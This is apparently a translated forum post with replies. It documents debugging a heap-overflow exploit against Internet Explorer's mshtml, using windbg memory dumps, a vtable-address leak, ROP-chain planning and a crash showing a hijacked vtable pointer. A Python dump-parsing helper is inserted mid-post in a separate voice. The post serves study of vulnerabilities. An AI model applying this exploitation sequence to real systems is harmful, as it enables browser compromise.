03f2b350  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2b360  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2b370  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2b380  45 00 45 00 41 00 45 00-48 00 01 00 45 00 00 00  E.E.A.E.H...E...
03f2b390  5b 10 d1 01 00 00 00 c2-0c 61 81 04 00 00 00 00  [........a......
03f2b3a0  02 00 00 00 18 00 02 05-fa 00 00 00 41 00 41 00  ............A.A.
03f2b3b0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b3c0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b3d0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b3e0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b3f0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b400  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b410  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b420  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b430  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b440  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b450  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b460  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b470  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b480  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b490  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b4a0  41 00 41 00 41 00 00 00-bc 10 d1 01 00 00 00 c2  A.A.A...........
03f2b4b0  0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05  .a..............
03f2b4c0  fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00  ....B.B.B.B.B.B.
03f2b4d0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b4e0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b4f0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b500  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b510  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b520  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b530  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b540  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b550  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b560  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b570  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b580  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b590  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b5a0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b5b0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 00 00  B.B.B.B.B.B.B...
03f2b5c0  91 10 d1 01 00 00 00 c2-c0 6a 81 04 00 00 00 00  .........j......
03f2b5d0  02 00 00 00 1c 00 02 05-f8 3a 8d 68 10 0b 37 01  .........:.h..7.
03f2b5e0  e0 90 ef 03 90 3c 8d 68-01 00 00 00 00 00 00 00  .....<.h........
03f2b5f0  09 08 08 01 ff ff ff ff-00 00 00 00 00 00 00 00  ................
03f2b600  00 00 00 00 ff ff ff ff-80 00 00 00 ff ff ff ff  ................
03f2b610  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b620  00 00 00 00 24 00 00 00-20 00 00 00 00 00 00 00  ....$... .......
03f2b630  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b640  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b650  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b660  00 00 00 00 00 00 00 00-00 00 00 00 88 b6 f2 03  ................
03f2b670  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b680  01 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b690  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b6a0  ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff  ................
03f2b6b0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b6c0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b6d0  00 00 00 00 00 00 00 00-f2 10 d1 01 00 00 00 c2  ................
03f2b6e0  a4 30 a9 03 00 00 00 00-02 00 00 00 1c 00 02 05  .0..............
03f2b6f0  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2b700  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2b710  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2b720  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2b730  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2b740  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2b750  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2b760  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2b770  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2b780  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2b790  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2b7a0  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2b7b0  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2b7c0  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2b7d0  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2b7e0  45 00 45 00 41 00 45 00-48 00 01 00 45 00 00 00  E.E.A.E.H...E...
03f2b7f0  d7 10 d1 01 00 00 00 c2-0c 61 81 04 00 00 00 00  .........a......
03f2b800  02 00 00 00 18 00 02 05-fa 00 00 00 41 00 41 00  ............A.A.
03f2b810  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b820  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b830  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b840  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b850  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b860  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b870  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b880  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b890  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b8a0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b8b0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b8c0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b8d0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b8e0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b8f0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b900  41 00 41 00 41 00 00 00-08 11 d1 01 00 00 00 c2  A.A.A...........
03f2b910  0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05  .a..............
03f2b920  fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00  ....B.B.B.B.B.B.
03f2b930  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b940  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b950  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b960  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b970  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b980  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b990  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b9a0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b9b0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b9c0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b9d0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b9e0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b9f0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2ba00  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2ba10  42 00 42 00 42 00 42 00-42 00 42 00 42 00 00 00  B.B.B.B.B.B.B...
03f2ba20  6d 11 d1 01 00 00 00 c2-c0 6a 81 04 00 00 00 00  m........j......
03f2ba30  02 00 00 00 1c 00 02 05-f8 3a 8d 68 10 0b 37 01  .........:.h..7.
03f2ba40  50 91 ef 03 90 3c 8d 68-01 00 00 00 00 00 00 00  P....<.h........
03f2ba50  09 08 08 01 ff ff ff ff-00 00 00 00 00 00 00 00  ................
03f2ba60  00 00 00 00 ff ff ff ff-80 00 00 00 ff ff ff ff  ................
03f2ba70  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2ba80  00 00 00 00 24 00 00 00-20 00 00 00 00 00 00 00  ....$... .......
03f2ba90  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2baa0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2bab0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2bac0  00 00 00 00 00 00 00 00-00 00 00 00 e8 ba f2 03  ................
03f2bad0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2bae0  01 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00  ................
03f2baf0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2bb00  ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff  ................
03f2bb10  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2bb20  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2bb30  00 00 00 00 00 00 00 00-4e 11 d1 01 00 00 00 c2  ........N.......
03f2bb40  a4 30 a9 03 00 00 00 00-02 00 00 00 1c 00 02 05  .0..............
03f2bb50  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2bb60  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2bb70  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2bb80  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2bb90  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2bba0  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2bbb0  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2bbc0  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2bbd0  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2bbe0  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2bbf0  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2bc00  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2bc10  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2bc20  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2bc30  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2bc40  45 00 45 00 41 00 45 00-48 00 01 00 45 00 00 00  E.E.A.E.H...E...
03f2bc50  a3 11 d1 01 00 00 00 c2-0c 61 81 04 00 00 00 00  .........a......
03f2bc60  02 00 00 00 18 00 02 05-fa 00 00 00 41 00 41 00  ............A.A.
03f2bc70  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bc80  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bc90  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bca0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bcb0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bcc0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bcd0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bce0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bcf0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd00  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd10  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd20  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd30  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd40  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd50  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd60  41 00 41 00 41 00 00 00-84 11 d1 01 00 00 00 c2  A.A.A...........
03f2bd70  0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05  .a..............
03f2bd80  fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00  ....B.B.B.B.B.B.
03f2bd90  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2bda0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2bdb0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2bdc0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2bdd0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2bde0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2bdf0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2be00  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2be10  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2be20  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2be30  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2be40  42 00 42 00 42 00 42 00-42 00 42 00              B.B.B.B.B.B.

It is easy to see that the AAAA string at 03f2ae30 has been overwritten on a large scale, so this is vulheap.
For comparison I dumped a lot more memory; the AAAA runs below that were not overwritten all appear as contiguous blocks.


However, compared with the Vulnerability Wars book, where the fa at address 03f2b040 is overwritten with 48 00 01 00, i.e. 0x00010048, that overwrite is visible (blue box in the figure below).
According to 0x03f2ae30 + 0x100 (EEEE...) + 0x8 (heap pointer size) + 0x100 (AAAA...) + 0x8 (heap pointer size) = 03f2b040, it should indeed be here, so I think I have not misunderstood.
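The block arithmetic above and the "is the fill still intact" check are easy to get wrong by eye when the `db` output runs to hundreds of lines. The following Python is an added analyst's helper, not code from the original post or from the Vulnerability Wars book: it parses windbg `db` lines in the layout shown above, groups the bytes into 2-byte cells (the A.A.A. / B.B.B. fills are UTF-16 strings), reports every run of identical cells and the address at which each run is broken, and recomputes the layout sum with the post's own numbers. The embedded dump lines are copied from the listing above; the function names (`parse_db`, `flatten`, `find_runs`, `layout_offset`) are my own.

```python
import re

# One windbg `db` line: 8 hex digits, two spaces, a 47-character hex field
# (16 bytes, separated by ' ' or '-'), two spaces, then the ASCII column.
# Partial last lines keep the 47-character field padded with spaces.
DB_LINE = re.compile(r"^([0-9a-fA-F]{8})  (.{0,47})")
HEX_BYTE = re.compile(r"[0-9a-fA-F]{2}")

# Constructed sample: lines copied from the `db` listing above, covering the
# end of the AAAA fill, the heap header, and the start of the BBBB fill.
SAMPLE_DB = """\
03f2bd50  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd60  41 00 41 00 41 00 00 00-84 11 d1 01 00 00 00 c2  A.A.A...........
03f2bd70  0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05  .a..............
03f2bd80  fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00  ....B.B.B.B.B.B.
03f2bd90  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2bda0  42 00 42 00 42 00 42 00-42 00 42 00              B.B.B.B.B.B.
"""


def parse_db(text):
    """Return a list of (address, bytes) for every `db` line in `text`.

    Only the fixed-width hex field is decoded, so the ASCII column can never
    be mistaken for data even when it happens to contain hex-looking letters.
    """
    entries = []
    for line in text.splitlines():
        m = DB_LINE.match(line.strip())
        if not m:
            continue
        addr = int(m.group(1), 16)
        data = bytes(int(b, 16) for b in HEX_BYTE.findall(m.group(2)))
        entries.append((addr, data))
    return entries


def flatten(entries):
    """Concatenate contiguous `db` lines into one (base, bytes) pair.

    A gap between lines would silently shift every later address, so it is
    treated as an error rather than papered over.
    """
    base, buf = entries[0][0], bytearray()
    for addr, chunk in entries:
        if addr != base + len(buf):
            raise ValueError(f"non-contiguous dump at {addr:#010x}")
        buf += chunk
    return base, bytes(buf)


def find_runs(base, data, unit=2, min_units=4):
    """Split `data` into `unit`-byte cells and return runs of identical cells.

    Each run is (start_address, cell_count, cell_bytes); runs shorter than
    `min_units` are ignored so heap header fields and padding do not show up.
    The address where a run ends is start_address + cell_count * unit, which
    is exactly the point at which an overwrite has interrupted a fill.
    """
    usable = len(data) - len(data) % unit
    cells = [data[i:i + unit] for i in range(0, usable, unit)]
    runs, i = [], 0
    while i < len(cells):
        j = i
        while j < len(cells) and cells[j] == cells[i]:
            j += 1
        if j - i >= min_units:
            runs.append((base + i * unit, j - i, cells[i]))
        i = j
    return runs


def layout_offset(base, sizes):
    """Address reached by laying out blocks of the given sizes back to back."""
    return base + sum(sizes)


if __name__ == "__main__":
    base, data = flatten(parse_db(SAMPLE_DB))
    for start, count, cell in find_runs(base, data):
        end = start + count * len(cell)
        print(f"{cell!r} x{count} from {start:#010x}, broken at {end:#010x}")
    # The post's layout: EEEE (0x100) + header (8) + AAAA (0x100) + header (8).
    print(f"layout ends at {layout_offset(0x03f2ae30, [0x100, 8, 0x100, 8]):#010x}")
```

Running it on the sample reports the A-fill as 11 cells from 03f2bd50 ending at 03f2bd66, the B-fill as 20 cells from 03f2bd84, and the layout sum as 03f2b040, matching the arithmetic in the text. Feeding it the full `db` output lets you see every intact and every interrupted fill at once instead of scrolling for the spot where the pattern changes.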


But strangely, my fa is still there... (red box in the figure below). This is probably why the vtable address my alert box printed earlier was wrong; I don't see this happening in other people's articles... hard to understand.


After obtaining the vtable address, compute the mshtml base address and build the ROP chain.


Then overflow again; this time the overflow is the same size as the one that just overwrote with BBBB and directly overwrites the vtable pointer, so the vtable pointer can be hijacked to an arbitrary address, as follows.

(6cc.7f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=07070024 ---> controlled vtable pointer ebx=01000000 ecx=040f8910 edx=00000041 esi=0375f530 edi=040e0790
eip=003d006b esp=0375f368 ebp=0375f3a0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
003d006b 777a            ja      003d00e7                                [br=1]

Summary

Debugging the PoC went fairly smoothly; debugging the exploit got stuck all over the place, sigh.
Mainly I learned some windbg usage.
For example, to set a breakpoint you can insert a math function into the HTML, such as Math.cos, and then break on jscript!Cos.
For example, to view jscript's export table you can search with x jscript!* in windbg; finding vtables can be done in a similar way (see above).


Latest replies (6)
toToC 2018-7-28 18:05
I followed the OP's analysis process to analyze this vulnerability, overwrote the virtual function pointer and completed the heap spray, but when the virtual function is called I find the value cannot be read. Can the OP explain the reason?
0:013> g
(e18.a98): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=07070024 ebx=01000000 ecx=02e84bd8 edx=00000041 esi=0208d430 edi=006df6b8
eip=6801e664 esp=0208d26c ebp=0208d2a0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
mshtml!NotifyElement+0x3e:
6801e664 ff5008          call    dword ptr [eax+8]    ds:0023:0707002c=????????

ysun 2018-7-29 20:12
Front-row support for the expert.
aalonglz 2019-1-3 16:28
Good stuff, learning from it.
badboyl 2 2019-1-4 15:44
Boss, the images are broken.
apaoa 2019-1-14 23:10
Boss, the images are broken. Please re-upload them.
kanxue 8 2019-2-1 13:40
sakura零, hello, the images are lost. We suggest saving all images locally on the forum; external links get lost after a while.
I looked at your posts; for most of them we manually converted the images to local storage, but a few still have no images and cannot be converted.